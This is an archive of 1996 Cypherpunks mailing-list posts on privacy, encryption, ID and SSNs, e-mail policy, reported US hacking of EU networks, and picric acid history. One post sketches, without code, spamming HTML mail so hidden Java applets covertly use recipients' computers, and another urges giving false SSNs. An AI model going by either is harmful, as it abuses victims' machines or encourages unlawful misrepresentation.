iQEVAwUBMgWr9BFhy5sz+bTpAQEOuQf+PAfJrxDLo4mEDsC8QelbBE5WHqNecmcq
soPN0ZDSDzSEdbofALHBEiAW8SHVT4h1XWPNG1QjNvuCsluLN4HX1IQSfCjjCNzO
/T9jqNqKbwDL5ssluD9nc/tbjaTN2zdXIVRE2/1QZmyrysT5MK5tiHzbbkrFjSy2
tVwUmEk9W+gTAzNBxLE5ni2Q6oLLuf+jnzw0jBn15nA3S7USN+G+dMsNG2ROR7ZI
Lp1a9XvqtjZ41Ju1C0QVR6u53a7mB8unrxxALewF2TjJUXxJOA0W1QbxM8/aI6cb
jjePr0NoohyCORLNh+pGaBQ+DXYY28JL5keCyGCr8k/INXHIksbEIQ==
=aTqo
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Tue, 6 Aug 1996 01:29:20 +0800
To: umwalber@cc.UManitoba.CA
Subject: Re: Bombs & bomb threats in LA
Message-ID: <9608051411.AA07503@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


"picric acid is indeed more powerful than TNT.  it was the primary explosive
used in WW-I. it was also the primary cargo on a ship, i think it was the
"Montblac", that exploded in Halifax harbor and nearly wiped-out the city. this
was in the 1917 - 1919 timeframe.

	-paul


> From cypherpunks-errors@toad.com Fri Aug  2 19:04:53 1996
> Date: Fri, 2 Aug 1996 13:12:30 -0500 (CDT)
> From: Sean Walberg <umwalber@cc.UManitoba.CA>
> To: Conrad Walton <conrad@walton.com>
> Cc: cypherpunks@toad.com
> Subject: Re: Bombs & bomb threats in LA
> Mime-Version: 1.0
> Content-Type> : > TEXT/PLAIN> ; > charset=US-ASCII> 
> Sender: owner-cypherpunks@toad.com
> Content-Length: 1357
> 
> I remember seeing an item on TV that had mentioned an acid bomb (it was a
> news report about a public access TV show that was showing people how to 
> make bombs).  In this example, some common chemicals were mixed together, 
> tightly closed, and moments later an explosion occured.  They never said 
> the chemicals, for all I know it could have been lemon juice and baking 
> soda in a sealed container, a la Dry Ice bomb...  It didn't look like a 
> bomb of mass destruction, more of a loud bang and a smallish explosion...
> 
> Sean
> 
> 
> On Fri, 2 Aug 1996, Conrad Walton wrote:
> 
> > >and everyplace else all the news.answers FAQs are stored. What, precisely, is
> > >an acid bomb? Also note the standard blame-the-Internet (not, say, increased
> > >irritation with government after the Republicans failed to reduce it) 
> > >rhetoric.
> > 
> > i'm not exactly sure what an acid bomb is, but according to my book, The 
> > Anarchist Cookbook, that I bought in 1972 (was the internet around back 
> > then?), there is a compound called "picric acid" that is "more powerful 
> > than TNT, but has some disadvantages". 
> 
> ------------------------------------------------------------------
> Sean Walberg                              umwalber@cc.umanitoba.ca
> The Web Guy                  http://home.cc.umanitoba.ca/~umwalber 
> UNIX Group, U. of Manitoba          PGP Key Available from Servers
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 6 Aug 1996 04:27:36 +0800
To: umwalber@cc.UManitoba.CA
Subject: Re: Bombs & bomb threats in LA
Message-ID: <199608051717.KAA14678@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 AM 8/5/96 EDT, Paul J. Bell wrote:
>"picric acid is indeed more powerful than TNT.  it was the primary explosive
>used in WW-I. it was also the primary cargo on a ship, i think it was the
>"Montblac", that exploded in Halifax harbor and nearly wiped-out the city. this
>was in the 1917 - 1919 timeframe.
>
>	-paul


The molecular difference between TNT and picric acid is a methyl group, 
weight 15 (on TNT) substituted for a hydroxyl, weight 17 (on 
picric acid.)   If there is a difference, it is a very small one.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 6 Aug 1996 05:32:50 +0800
To: cypherpunks@toad.com
Subject: Confirmation Needed: American(s) hack into Euro systems ...
Message-ID: <199608051717.KAA21733@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



Anyone knows the details behind this?

Ern

------- Forwarded Message

			    CDA96-L Digest 48

Topics covered in this issue include:

  1) Who's infringing whose privacy?
	by MichaelP <papadop@peak.org>

- ----------------------------------------------------------------------

Topic No. 1

Date: Sun, 4 Aug 1996 01:31:45 -0700 (PDT)
From: MichaelP <papadop@peak.org>
Subject: Who's infringing whose privacy?
Message-ID: <Pine.SUN.3.91.960804010241.24125B-100000@kira>

London Sunday Times August 4 1996 

American spies hack into Euro computers to steal trade secrets

AMERICAN intelligence agents have hacked into the computers of the
European parliament and European commission as part of an
international espionage campaign aimed at stealing economic and
political secrets, according to investigators.

The European parliament has called in British communications experts
to improve its security and to block further attempts by American
govern ment agents to spy on its workings.

Security officials at the parliament's Luxembourg offices say they
have discovered several recent instances in which its communications
system was compromised by American hacking. They have also found
evidence that the Americans used information obtained from hacking to
help them in negotiations last year on the General Agreement on
Tariffs and Trade (GATT).

Lord Plumb, leader of the British Tory MEPs in the European
parliament, said he was shocked by the disclosure. "I will be taking
this up directly with the American ambassador [to the European
Union]," he said.

The CIA has already been accused by the Japanese and French
governments of hacking into their communications networks in an
attempt to obtain confidential trade secrets.

The European parliament's computer network links more than 5,000 MEPs,
officials, researchers and other staff to each other, and to the
European commission headquarters in Brussels and the council of
ministers.

Traffic across the network by telephone and computers includes details
of the private medical and financial records of many MEPs and
officials, and discussion documents on confidential issues, including
trade, tariff and quota agreements. The records of closed committees
of inquiry into BSE and fraud are also stored on the system.

European parliament sources say the Americans accessed the network by
compromising the information exchanges that link the parliament's
internal networks with the Internet and external users.

The devices, called "routers", filter entry to the European
parliament's network. It is understood the Americans were able to
obtain access to what is called the simple network management protocol
(SNMP), the language that enables the networks to talk to each other.
They were able to exploit the fact that parts of the system were
manufactured by two American firms.

The breach came to light when officials believed that American
negotiators had been given advance warning of confidential European
Union positions in last year's trade negotiations. "It was established
that the system had been penetrated just days before the talks," an EU
source said. "Our principal concern is not to establish what has
already been copied but to ensure that it does not happen again. This
is an on-going problem."

A spokeswoman for Antonio Cavaco, director of data processing at the
commission, confirmed that allegations of hacking had been
investigated. However, she said she was unable to provide any details.

- ------------------------------

End of CDA96-L Digest 48
************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Mon, 5 Aug 1996 19:14:10 +0800
To: cypherpunks@toad.com
Subject: Getting serious: Crypto CD
Message-ID: <9608050845.AA06404@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: secure@commtouch.com, cypherpunks@toad.com
Date: Mon Aug 05 10:43:16 1996
Dear Sirs

I want to put together a CDROM containing "everything" a cryptographically 
interested person needs. I would like to include your cryptographically 
relevant products.

The CD will be organized the following way:

- - the user interface consists of HTML-pages
- - one of these pages will include a directory of files
- - one directory entry will be your product (whatever you prefer as a name)
  and leads to a page/pages of your design.
- - you can use a directory named after your company (but in compliance with
  CDROM restrictions -> 8 letters, no special chars, i.e. "mycompny" or so)
  and any subdirectories you want.
- - binary program space is restricted to 25 MB
- - html space is restricted to 1 MB

Dos and Donts:

- - program limitations (stuff you only get when you register/buy the full
  product) must be declared.
- - export/usage restrictions must be declared (US/nonUS)

Further info:

The CD will be sold at around USD 15 (including shipment)

Advertisement:

Seperate advertisment (html pages and graphics) can be made for USD 50.- 
per page (<200K). A link on the index page will be included.

Legalese:

- - This CD will be mastered and shipped outside US, so whatever you send us
  (if you send it from outside US) will not be affected by ITAR.
- - The copyright will remain in your hands, you only grant Pini Computer
  Trading (PCT) the permission to duplicate and distribute the content on
  a CDROM and, should we choose to do so, on the internet.
- - The legality of your content is your responsiblity. 


If you are interested, mail me...

Sincerely yours,

Remo Pini
Pini Computer Trading

PS: This message may have been forwarded by anyone. If you receive it 
several times, ignore the redundant mails.

PSS: This message may be forwarded to anyone offering a cryptographically 
relevant product. (-> forward ahead, cypherpunks)

- --------< fate favors the prepared mind >--------
Remo Pini                            rp@rpini.com
PGP:  http://www.rpini.com/remopini/rpcrypto.html
- ------< words are what reality is made of >------
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMgW0JRFhy5sz+bTpAQFdsQgAsxz04ridQ+urdvMVQzpBVkjonuc0ek4Q
GihsyATZi2U0Fi73UleJsOz9rsnmodvcJYvkQ2Omtp7mQOFHYWBi7nihELMb06OQ
YXduCr/0BQWRX+ORrJtQtehMdctzHnQcTV1AEcCR400YQlBu2YLiB7MLWsEtvqoK
15q0q3Hu7TMOVvplgSMjAT2yAevI5iKEn1AJ5q+kqjQ81fT3KTtuJh2U06TLtSQp
2PecOIk8rPq6fy+wyQN6/PssLrbKkPIKDzMwpupDUb4rEMGNJYP/wykF4BN+vBBE
8pvpD+qd5iODCZplsQ1lY95t48xqBsZ4AQHl8W5WKha5LMBuIFVmIQ==
=RdAm
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Aug 1996 04:51:05 +0800
To: cypherpunks@toad.com
Subject: The Myth of Flat Rates and Infinite Bandwidth
Message-ID: <ae2b842502021004a399@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:40 PM 8/5/96, Martin Minow wrote:
>Arun Mehta <amehta@giasdl01.vsnl.net.in> writes:
>
>>
>>True, though even better would be simply to charge you a flat
>>rate. If billing is that expensive, why bother?
>>
>
>Tragedy of the Commons.
>
>Flat rate works only if no single user can use more than
>a tiny fraction of the total bandwidth.
>

This was also the fallacy of the "dark fiber" vision of George Gilder, who,
as an economist of sorts, should've known better.

--Tim may

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Anonymous MacDonald <remailer@cypherpunks.ca>
Date: Tue, 6 Aug 1996 05:59:02 +0800
To: cypherpunks@toad.com
Subject: Re: Implementing DSS Fortezza KEA
Message-ID: <199608051812.LAA32671@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack wrote:
> 	There ws a paper presented at the rump session of Crypto '95
> entitled the k1 Key Exchange Algorithim.  The origin of the algorithim
> is not clear, however, if you're getting bitstreams from a Fortezza,
> you might want to find a copy of the paper.

The web says the paper was presented by one Carl Ellison.  How about it
Carl, is it online somewhere??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 6 Aug 1996 07:59:00 +0800
To: NetSurfer <cypherpunks@toad.com
Subject: Re: ****Tacoma, Washington Starts Taxing Internet Access 07/30/96
Message-ID: <2.2.32.19960805181729.00e8c4a0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:42 AM 8/5/96 -1000, NetSurfer wrote:
>
>On Wed, 31 Jul 1996, Joseph M. Reagle Jr. wrote:
>
>>   	  				 
>> >WASHINGTON, DC, U.S.A., 1996 JUL 30 (NB) -- By Bill Pietrucha.  
>> >Tacoma, Washington, has just gained the distinction of being the 
>> >only municipality in the United States to tax Internet Access 
>> >providers (IAPs) like telephone service providers. 
>> >
>
>Hawaii has been taxing this (and everything else incl. collected 
>taxes, food & medical) for years :-( calling it a "general excise tax"

I believe the reason the Tacoma ordinance is getting so much flack is that
they are wanting to charge sales tax on all transactions that take place
from ISPs in Tacoma.

This type of taxation is not new.  Various jurisdictions have tried to use
the same thing on mail order houses.  Having worked for a service bureau
that dealt with mail order, I know what a hassle it is to try to keep track
of such taxation.  There is a company that will sell you the data of all of
the sales tax rates throughout the country.  This includes every little
podunk city, county, and fire district tax.  They are divided by zip code,
but that is no guarantees that you have the right place. The reality is that
trying to "be legal" under such regulations is next to impossible, even with
the proper data.  I know of few mail order firms that are willing to go to
that extreme.  (Unless, of course, they have gotten the proper threats from
some miffed tax baron.)

And they wonder why there is so much disrespect for the law...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Tue, 6 Aug 1996 03:15:49 +0800
To: cypherpunks@toad.com
Subject: Re: Again, disappointed in Gingrich
Message-ID: <2.2.32.19960805154557.0073b034@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:17 PM 8/1/96 EDT, you wrote:
:	Again, I'm disappointed in Gingrich. This amplifies the earlier
:comments.
:	-Allen

I have never been disappointed in Gingrich; he has always been what he
seems--just another politician, albeit a front for the "religious" right.
Why expect anything different?

Alec (from Ga.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: camcc@abraxis.com
Date: Tue, 6 Aug 1996 03:16:50 +0800
To: "Chris Adams" <adamsc@io-online.com>
Subject: Re: Tolerance
Message-ID: <2.2.32.19960805154837.006b4d98@smtp1.abraxis.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:46 PM 8/1/96 -0800, you wrote:
:Just a comment to all of the 'true libertarians' out there, especially
:the "defend to the death" types:  How many of you defended Mr.
:Sternlight's recent membership?
:
Beautiful.

Alec





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Tue, 6 Aug 1996 04:24:01 +0800
To: cypherpunks@toad.com
Subject: gathering bandwidth through spam
Message-ID: <320629E6.247A@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Maybe I'm dense, but it didn't really "click" until the other day that
the Netscape mail reader, which renders html pages mailed as attachments
right there in the mail reader window, would also run any Java applets
(and, I guess, Javascript code) referenced by the page.

If you're using Netscape as a mail reader, and this isn't old news to
you, you can try it: point the browser at a page with an applet, and
then use the "File->Mail Document" menu command to mail it to yourself.

Thus:  if you want to gather some free compute cycles, just spam a
document out to a few thousand hapless victims.  Those using Netscape
for mail (and you can find them pretty easily by looking at the
"X-Mailer" field when creating your mailing list) will click on your
message, pull your applet, and give you some cycles without realizing
it.  Of course, your applet will be free to connect back to home base
and relay any results it gets.

Cool, huh?

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight
arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Tue, 6 Aug 1996 07:19:59 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: A SPANIARD IN THE WORKS? (non-crypto)
Message-ID: <Pine.SUN.3.91.960805122848.22701A-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Is there anyone on the list who lives in Spain?  If so, please
reply by private e-mail.

Thanks,


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 6 Aug 1996 04:08:34 +0800
To: umwalber@cc.UManitoba.CA
Subject: The Halifax Explosion
Message-ID: <2.2.32.19960805165110.006766dc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:11 AM 8/5/96 EDT, Paul J. Bell wrote:
>"picric acid is indeed more powerful than TNT.  it was the primary explosive
>used in WW-I. it was also the primary cargo on a ship, i think it was the
>"Montblac", that exploded in Halifax harbor and nearly wiped-out the city. this
>was in the 1917 - 1919 timeframe.
>
>	-paul
>

The Mont Blanc carried quite a lot of fun stuff.  "Stored in the holds, or
simply stacked on deck, were 35 tons of benzol, 300 rounds of ammunition, 10
tons of gun cotton, 2,300 tons of picric acid (used in explosives), and
400,000 pounds of TNT."  Thursday December 6, 1917.  The greatest
conventional explosion produced by mankind.

See:

http://ttg.sba.dal.ca/nstour/halifax/explode.htm

Governments shouldn't be trusted with high explosives.  They can't be
counted upon to handle them properly.

>From 1889-1989 the governments of the world murdered 160 million people.
>From 1889-1989 the private individuals of the world murdered fewer than 20
million people.

See Death by Government by R. J. Rummel
http://www.amazon.com/exec/obidos/ISBN=1560001453/1372-7724803-532789

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 6 Aug 1996 04:29:25 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Internal Passports
In-Reply-To: <199608042250.PAA13719@toad.com>
Message-ID: <Pine.SUN.3.94.960805124757.25001A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 4 Aug 1996, Bill Stewart wrote:

[...]

> You can still travel in a car if someone else is driving,
> and you can still get on a train without identification,
> but without papers you can't fly or drive, and you can't
> ride a horse on the freeway except in the back of a horse trailer.
> Driver's licenses were the beginning of a long downhill trend.
> 
> I wonder if they'll still accept an American passport; the country
> has obviously been taken over by Pod People while we weren't looking....

I often have trouble with foreign passports and one of my associates often
has extensive problems trying to use an american passport for anything in
the United States.

Comments uttered in my presence on the subject have included:

"We don't accept THOSE."

"Sorry, we need to see OFFICIAL identification."

"Don't you have something state issued?"

"Uh, we need a driver's license number."


> #			Thanks;  Bill
> # Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
> # <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!
> 
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 6 Aug 1996 04:48:02 +0800
To: cypherpunks@toad.com
Subject: Email Confidentiality and Malpractice?
Message-ID: <v0300780aae2bd8ca6cc2@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: oldbear@pop.tiac.net
Mime-Version: 1.0
Date: Mon, 05 Aug 1996 12:48:12 -0300
To: Bob Hettinga <rah@shipwright.com>
From: The Old Bear <oldbear@arctos.com>
Subject: Email Confidentiality and Malpractice?

Bob:

I always feel funny passing along items like this from usenet.

This was posted to nine of the alt.business newsgroups dealing with
law and insurance investigation.  It seemed reasonably interesting,
contains some useful information, and is not overly offensive for a
self-promotional spam.  (And, at least it was posted in appropriate
places.)

If you see any merit in all or part of this being reposted to dcsb
or elsewhere, feel free to do so.

Cheers,
Will

--- Forwarded message follows ---
Newsgroups:alt.business.insurance
From: syr@netroplis.net (Bill Fason)
Subject: Email and confidentiality: Are you committing malpractice?
Organization: Serves You Right Civil Process & Investigations
Date: Sat, 03 Aug 96 17:57:54 GMT
Lines: 74

If you're discussing cases through email and you're not encrypting your
correspondence, then you could be committing malpractice.  See:

        http://www.gsu.edu/%7Elawppw/lawand.papers/bjones.html

                        Client Confidentiality:
            A Lawyer's Duties with Regard to Internet E-Mail
                                  by
                            Robert L. Jones

                            August 16, 1995

    Contents:
       1. E-Mail v. Snail Mail
       2. Hacker, Cracker, Phracker - Sniffer, Spoofer, Spy
       3. Encryption to the Rescue?
       4. Bad Things That Happen to Good Lawyers
       5. Ethical Considerations
       6. The Attorney-Client Privilege
       7. Negligence Anyone?
       8. Conclusion
       9. Endnotes

Bob's homepage is  http://www.mindspring.com/~bobjones/my1sthom.html


And here is the website for Georgia State Univ. Law School.  It has one
of the best collections of cyberlaw resources I've seen.  GSULaw is at
the cutting edge of the field.

            http://www.gsu.edu/~lawadmn/gsulaw.html

While Bob's brilliant article specifically addresses attorney-client
confidentiality, his insights apply to any professional using email.
In fact, anyone who uses email for internet or intranet communications
faces the same fact of life: unencrypted email carries no expectation
of privacy.  It's like dropping a postcard through the mail.  In fact,
it's even worse.  Important discussions of cases, clients, patients,
bids, negotiations, strategies or anything requiring confidentiality
needs to be securely encrypted.  Sending unencrypted sensitive email
invites nightmare scenarios.

        Viacrypt is the answer. It combines the essentially unbreakable
strength of Phil Zimmerman's PGP (Pretty Good Privacy) with the
user-friendly interface of Windows.  Easy to install and use, Viacrypt
allows the user to quickly encrypt and decrypt email.  It also allows
the user to sign messages, and to check the signature of other electronic
messages.
        Viacrypt also allows the user to encrypt files on one's own hard
drive.  A user of PGP can leave the office knowing that sensitive files
will remain confidential regardless of who is on the evening cleanup
crew.
        Regular PGP for DOS is free. If you want to find out more about
where and how to get your free copy, then visit the Encryption Policy
Resource Page:

                     http://www.crypto.com/

        And if you need help getting it up and running, feel free to
contact me.

        Viacrypt, on the other hand, costs money.  I offer it
        for $125 plus shipping.

        I suggest that you get your copy fast while it is still legally
available.  Both FBI Director Louis Freeh and Vice President Al Gore
have both spoken out against allowing US citizens to use encryption this
strong.  They want everyone to register their private encryption software
keys with the federal government, thus allowing the feds to read anyone's
email.  It is reminiscent of the old communist governments' laws
requiring citizens to register their typewriters with the police.
Widespread use of PGP will hamper government efforts to ban it.  PGP is
so strong that the federal government has declared it a weapon and
banned its export.

Bill Fason
Serves You Right
Civil Process & Investigations          * Skiptraces
1436 W. Gray #272                       * Background Checks
Houston TX 77019                        * Asset Searches
713/524-4767                            * PGP Encryption Consulting
713/942-8165 fax                        * Financial Fraud Detection
SLN A-8111

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Tue, 6 Aug 1996 07:59:08 +0800
To: cypherpunks@toad.com
Subject: SSNs (was Re: Internal Passports)
In-Reply-To: <Pine.SUN.3.91.960805040046.21970A-100000@eff.org>
Message-ID: <320652BC.31DF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
[ ...random losers asking for your SSN... ]
> > I was horrified and gave a random number.
> 
> You should always be horrified, and always give a random number.

Well, it would be nice if it was that easy.  You (legally) need to give
the correct one to anyone who has to make a report about you to the IRS,
right?  Such as your employer.  But it's not always clear who else needs
it.  Is it needed to allow someone to do a credit check on you?  Is it
needed to get a driver's license?  (The fine print on the DMV forms says
"yes".)  Is it necessary to make use of employer-sponsored medical
insurance?  (I suspect that the answer to this one is "no", except for
the fact that when my employer set up my medical insurance they let the
insurance company use my SSN as my insurance-related-ID-number.  But in
any event, my dentist told me, "if you don't give it to us, they won't
pay.")

I don't like the idea of having a universal ID number, but neither do I
like the idea of having to go to extreme lengths to make the "right
thing" happen for something where my effort will have only moral impact,
not material.

If you already have a SSN, can you get a *new* one in any legal way?
(Sort of the same idea as changing your phone number to avoid
telemarketing scum...)

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 6 Aug 1996 04:12:03 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Internal Passports
In-Reply-To: <Pine.SUN.3.91.960805040046.21970A-100000@eff.org>
Message-ID: <Pine.SUN.3.94.960805130022.25646B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 5 Aug 1996, Declan McCullagh wrote:

> I had the same problems when I was working at Xerox in Webster, NY. 
> Supermarkets just plain didn't want to accept my passport as valid ID.
> 
> More recently, I attended an IEEE conference at MITRE in Virginia. To 
> enter the building, they required you to fill out a form listing your 
> SSN. The forms were taped to the guard's desk, in full view of anyone who 
> was curious.
> 
> I was horrified and gave a random number.

You should always be horrified, and always give a random number.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 6 Aug 1996 08:21:12 +0800
To: cypherpunks@toad.com
Subject: Re: Corporate e-mail policy
Message-ID: <ae2ba0d5030210046128@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:34 PM 8/5/96, James C. Sewell wrote:

>  Personally I think I would approach it as the privacy we have with the
>eontents of our car's trunk.  If an officer has probable cause to search
>the trunk then he can, otherwise he can't.  It's not a perfect system but
>it does work better than other alternatives I can think of.

This comparison breaks down completely. The police are not involved, so the
language of "probable cause" is inappropriate. We may differ in our
opinions on whether employers can search mail and car trunks, but the
language of "probable cause" suggests a legal/constitutional issue that is
probably not there.

Imagine Alice operates a courier service and owns and operates several
delievery vehicles . Bob, her employee, drives one of her cars. Is he to
imagine that the trunk may not be opened by Alice unless she has "probable
cause"? Nonsense. It it _her_ car, bought and paid for. To imagine
otherwise is to wander into a fever swamp in which owners of property may
not even use their own propery.

(If anyone suggests that landlords cannot barge into tenant's apartments,
this is a different situation. For one thing, there are usually terms and
conditions spelled out in a contract about when and under what
circumstances a landlord may enter the premises.)

Is corporate e-mail more like the courier service example or more like the
landlord-tenant example? I suggest the former, as the e-mail is used in the
everyday furtherance of business, and illegality/abuse may harm the owner,
as with drugs in the trunk of a courier car. (The owner of a property who
leases it out is generally not held liable for the misdeeds and crimes of
his tenants, except in some special circumstances. Hotel owners are not
guilty of the crimes of the residents, which are of course common.)

The original question asker, who asked how to help write his corporate
e-mail policy, is free to lobby for a different interpretation; this is,
after all, a matter of agreed-upon policy, not a matter for the state to
stick its nose into.

--Tim May


P.S.

>  Just remember, as was said, once you make a policy it becomes precedence
>and will stick with you forever... longer if it's a bad one.
>

Alice the Courier Service is of course perfectly free to announce new
policies, so your point is incorrect.

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hayashi_Tsuyoshi <take@barrier-free.co.jp>
Date: Mon, 5 Aug 1996 14:27:09 +0800
To: cypherpunks@toad.com
Subject: key escrow article on the Asahi Shinbun
Message-ID: <199608050420.NAA28069@ns.barrier-free.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


I found key escrow article on the Asahi Shinbun.  Asahi
Shinbun is one of the most famous Japanese newspaper.  I
can't write more info because I am busy now.

BTW, Asahi Shinbun has their own server:

  URL: http://www.asahi.com/.

# English version is also available.

- Tsuyoshi Hayashi <take@barrier-free.co.jp>
- PGP public key: http://www.barrier-free.co.jp/take/pgpkey
- (CF 27 34 5B 46 FA 2A 12  D2 4C E3 F7 2A 45 E0 22)
- Barrier Free, Inc. (established on 25 Jan 1996)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@galaxy.galstar.com (Igor Chudov)
Date: Tue, 6 Aug 1996 05:46:10 +0800
To: ggr@usenix.org
Subject: Integrating PGP 3.0 Library with INN
Message-ID: <199608051829.NAA19030@galaxy.galstar.com>
MIME-Version: 1.0
Content-Type: text


Hi,

Has anyone thought of integrating PGP 3.0 library with INN? 

I was thinking along the lines of having PGPMoose support built
right into INN: if an arriving article is posted to a moderated
newsgroup for which a PGP key is available in the INN's keyring,
INN verifies existence and correctness of a PGP signature.

An article that fails this verification will be dropped. 

Same thing can be used for authenticating newgroup and rmgroup
messages, in the spirit of true freedom on usenet -- anyone would
be sent _their own_ newgroups and rmgroups but no one will
be impersonated.

For those not familar with PGP Moose, it is a program that was written
by Greg Rose. It is used for signing approvals on usenet articles. It
takes message body, several important header fields, signs them with
PGP and places the signatures in the headers, in order not to clobber the
text.

If moderators choose short enough keys (512 bits for example), this
verification will not take any significant amount of CPU time.


igor




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James C. Sewell" <jims@MPGN.COM>
Date: Tue, 6 Aug 1996 05:26:39 +0800
To: cypherpunks@toad.com
Subject: Re: Corporate e-mail policy
Message-ID: <2.2.32.19960805173421.0075df00@tansoft.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:22 PM 8/3/96 -0400, Rabid Wombat wrote:

> What you 
>publish as a use policy, and what you actively enforce do not have to be 
>the same.
>

  Unfortunately this is a problem in many companies.  There are policies
which are enforced to the letter, guidelines which are just suggestions,
and fake-rules which are not even attempted to be enforced.

  The problem comes when the employee and employer can't distinguish
them from each other.  

  Personally I think I would approach it as the privacy we have with the
eontents of our car's trunk.  If an officer has probable cause to search
the trunk then he can, otherwise he can't.  It's not a perfect system but
it does work better than other alternatives I can think of.

  Write into your policy:
